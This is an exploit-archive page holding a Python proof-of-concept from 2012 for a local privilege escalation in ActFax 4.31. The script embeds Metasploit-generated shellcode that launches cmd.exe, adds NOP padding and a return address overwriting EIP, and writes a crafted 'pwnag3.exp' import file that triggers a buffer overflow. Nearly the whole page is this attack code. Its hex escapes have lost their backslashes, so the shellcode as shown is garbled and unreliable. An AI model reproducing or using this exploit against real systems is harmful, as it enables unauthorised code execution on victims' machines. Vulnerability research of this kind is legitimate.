ActFax 4.31 Local Privilege Escalation Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ActFax 4.31 Local Privilege Escalation Exploit
# Published : 2012-08-29
# Author :
# Previous Title : Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit
# Next Title : soapbox <= 0.3.1 Local Root Exploit

#!/usr/bin/python
#Title: ActFax 4.31 Local Privilege Escalation Exploit
#Author: Craig Freyman (@cd1zz)
#Discovered: July 10, 2012
#Vendor Notified: June 12, 2012
#Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html

#msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c
#[*] x86/alpha_upper succeeded with size 466 (iteration=1)
sc = (
"x89xe5xdbxcexd9x75xf4x58x50x59x49x49x49x49"
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx5a"
"x48x4dx59x45x50x35x50x53x30x43x50x4dx59x4a"
"x45x56x51x48x52x55x34x4cx4bx36x32x50x30x4c"
"x4bx36x32x44x4cx4cx4bx30x52x52x34x4cx4bx34"
"x32x56x48x34x4fx38x37x51x5ax37x56x46x51x4b"
"x4fx46x51x39x50x4ex4cx47x4cx35x31x43x4cx43"
"x32x36x4cx31x30x49x51x48x4fx34x4dx55x51x58"
"x47x4ax42x4cx30x30x52x50x57x4cx4bx50x52x52"
"x30x4cx4bx37x32x47x4cx55x51x58x50x4cx4bx47"
"x30x33x48x4bx35x39x50x34x34x50x4ax33x31x4e"
"x30x30x50x4cx4bx57x38x52x38x4cx4bx36x38x51"
"x30x33x31x4ex33x4bx53x57x4cx57x39x4cx4bx56"
"x54x4cx4bx53x31x48x56x36x51x4bx4fx46x51x4f"
"x30x4ex4cx49x51x58x4fx54x4dx55x51x39x57x50"
"x38x4bx50x32x55x5ax54x53x33x43x4dx4bx48x47"
"x4bx33x4dx46x44x53x45x5ax42x36x38x4cx4bx30"
"x58x47x54x45x51x49x43x45x36x4cx4bx44x4cx30"
"x4bx4cx4bx36x38x55x4cx53x31x59x43x4cx4bx54"
"x44x4cx4bx55x51x48x50x4cx49x31x54x47x54x36"
"x44x51x4bx31x4bx55x31x36x39x31x4ax36x31x4b"
"x4fx4dx30x51x48x51x4fx50x5ax4cx4bx55x42x5a"
"x4bx4dx56x31x4dx52x4ax45x51x4cx4dx4dx55x4f"
"x49x45x50x53x30x53x30x46x30x42x48x36x51x4c"
"x4bx52x4fx4dx57x4bx4fx39x45x4fx4bx4ax50x4e"
"x55x39x32x31x46x55x38x59x36x4dx45x4fx4dx4d"
"x4dx4bx4fx58x55x57x4cx35x56x53x4cx44x4ax4d"
"x50x4bx4bx4dx30x52x55x55x55x4fx4bx37x37x35"
"x43x52x52x32x4fx43x5ax43x30x56x33x4bx4fx4e"
"x35x32x43x32x4dx45x34x46x4ex35x35x43x48x45"
"x35x33x30x41x41")

frontpad = "x90" * 10 
eip = "x22x1bx40x00"	#00401B22 RETN actfax.exe
backpad = "x90" * 6000
buff = frontpad + sc + "x90" * (502 - len(sc)) + eip + backpad

f = open("pwnag3.exp", "w")
f.write(
"User NametEntire User NametPasswordtAlias-NamestGrouptDirect DialingtCost AccounttPermissionstCommentstUser-Definedt"
"Predefined SettingstName 1tName 2tName 3tName 4tName 5tDepartmenttAttention oftPhone 1tPhone 2tFax NumbertE-Mailt"
"Coverpage Non-WindowstOverlay Non-WindowstCoverpage WindowstOverlay WindowstUser-DefinedtPrinter SettingstAutomatic Printing Outgoingt"
"Printer Name OutgoingtReport OutgoingtAutomatic Printing IncomingtPrinter Name IncomingtReport IncomingtNotification Outgoingt"
"Email OutgoingtNotification IncomingtEmail IncomingtAttach Original MessagetUser-Defined Archive SettingstExport Outgoingt"
"Export IncomingtExport-PathtMark as Readx0dx0a"+buff+"x0dx0a")
f.close()